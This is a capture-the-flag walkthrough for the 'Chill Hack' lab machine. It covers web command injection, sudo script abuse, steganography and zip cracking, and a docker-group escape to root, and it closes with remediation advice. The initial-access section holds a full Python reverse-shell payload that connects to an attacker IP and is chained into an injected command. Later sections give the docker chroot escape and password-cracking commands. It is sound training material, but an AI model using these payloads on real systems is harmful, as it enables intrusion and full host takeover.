Target IP: chillhack.thm (Requires /etc/hosts entry)
Difficulty: Easy
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
“Chill Hack” is a Linux machine featuring a vulnerable web application that allows for Command Injection, granting initial access as www-data. Lateral movement to the user apaar is achieved by exploiting a script (.helpline.sh) that permits arbitrary command execution. Further lateral movement to anurodh involves extracting credentials hidden inside a JPEG image via Steganography. Privilege escalation to Root is accomplished by abusing membership in the docker group to mount the host filesystem into a container, effectively bypassing filesystem restrictions.
Key TTPs (MITRE ATT&CK):
- T1059.003 (Command and Scripting Interpreter): Command Injection via Web UI.
- T1078 (Valid Accounts): Switching users via
sudoandsu. - T1027 (Obfuscated Files or Information): Steganography (
steghide) on images. - T1110 (Brute Force): Cracking Zip passwords (
zip2john). - T1611 (Escape to Host): Docker container escape via volume mounting.
2. Operational Setup
Host Configuration
echo "10.10.x.x chillhack.thm" | sudo tee -a /etc/hosts3. Initial Access: Command Injection
Context: You mentioned starting with a reverse shell. On this box, the web interface has a “Command” field.
- Enumeration: The website features a tool that allows users to run commands (like
ls,id). - Exploitation: We inject a payload to bypass the filter and execute a reverse shell.
# Payload example
ls; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.YOUR.IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'- Status: Shell as
www-data.
4. Lateral Movement 1: The Helpline Script
Enumeration
We list files in home directories or run sudo -l.
sudo -l
# User www-data may run the following commands on chillhack:
# (apaar) NOPASSWD: /home/apaar/.helpline.shAnalysis
We can run this script as the user apaar without a password.
Let’s inspect the script:
cat /home/apaar/.helpline.sh
# It likely asks for input and executes it, or spawns a shell ($msg 2> /dev/null).Exploitation
We run the script and ask for a shell.
sudo -u apaar /home/apaar/.helpline.sh
# Prompt: "Enter message to send to helpline"
/bin/bashStatus: User apaar.
User Flag: /home/apaar/user.txt.
5. Lateral Movement 2: Steganography
Enumeration
We find a directory /var/www/files/images containing standard images.
You transferred these to your local machine (using Python http.server or scp).
Steganography Analysis
We check the images for hidden data using Steghide.
steghide extract -sf hacker-with-laptop.jpg
# Passphrase: (Try empty) -> Succcess!- Result: Extracted
backup.zip.
Cracking the Zip
The zip file is password protected.
- Hash Extraction:
zip2john backup.zip > zip.hash- Cracking:
john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
# Password found: pass1word (example)- Extraction:
Unzip the file to find
source_code.php(or similar). Inside, there is a base64 encoded password string.
echo "BASE64_STRING" | base64 -d
# Result: New Password for AnurodhAccess
su anurodh
# Enter decoded passwordStatus: User anurodh.
6. Privilege Escalation: Docker Escape
Enumeration
We check the groups anurodh belongs to.
id
# uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)Critical Finding: Membership in the docker group.
The Vulnerability (GTFOBins)
Being in the docker group is essentially equivalent to being Root. We can spin up a container and mount the entire host filesystem (/) into the container. We can then modify host files from inside the container.
Exploitation
# docker run -v /:/mnt --rm -it <image> chroot /mnt sh
docker run -v /:/mnt --rm -it alpine chroot /mnt shBreakdown:
-v /:/mnt: Mount the host’s root directory (/) to the container’s/mntdirectory.--rm: Delete container after exit (clean up).-it: Interactive TTY.alpine: The image to use (lightweight).chroot /mnt sh: Change the root directory of the process to/mnt(which is the host’s actual root) and spawn a shell.
Result: You are now inside the host filesystem as root.
# whoami
root
cat /root/root.txt7. Remediation (Blue Team)
- Web Input Validation: Implement strict input sanitization on the “Command” web interface to prevent arbitrary command execution.
- Sudo Privileges: The
.helpline.shscript allows arbitrary execution. It should not be runnable via sudo, or it should be rewritten to accept only specific, safe arguments. - Docker Group Security:
- Do not add standard users to the
dockergroup. It is a known privilege escalation vector. - Use Rootless Docker if users need to run containers without root privileges.
- Sensitive Data: Remove sensitive passwords embedded in source code or hidden in image files on public-facing servers.